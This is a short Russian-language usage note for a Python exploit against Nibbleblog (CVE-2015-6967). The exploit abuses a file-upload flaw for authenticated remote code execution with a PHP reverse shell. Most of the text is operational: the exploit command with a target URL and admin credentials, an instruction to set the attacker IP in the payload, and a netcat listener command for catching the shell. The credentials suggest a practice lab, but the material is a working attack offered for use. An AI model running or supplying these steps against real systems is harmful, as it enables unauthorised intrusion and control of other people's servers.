
Python-эксплойт для CVE-2015-6967, нацеленный на Nibbleblog, с полезной нагрузкой reverse shell. Выполняет аутентифицированное удаленное выполнение кода через уязвимость загрузки файлов.
python exploit.py --url http://xx.xx.xx.xx --username admin --password nibbles --payload phprevshell.php
Измените $ip в строке 7 файла phprevshell.php
nc -lvnp 1234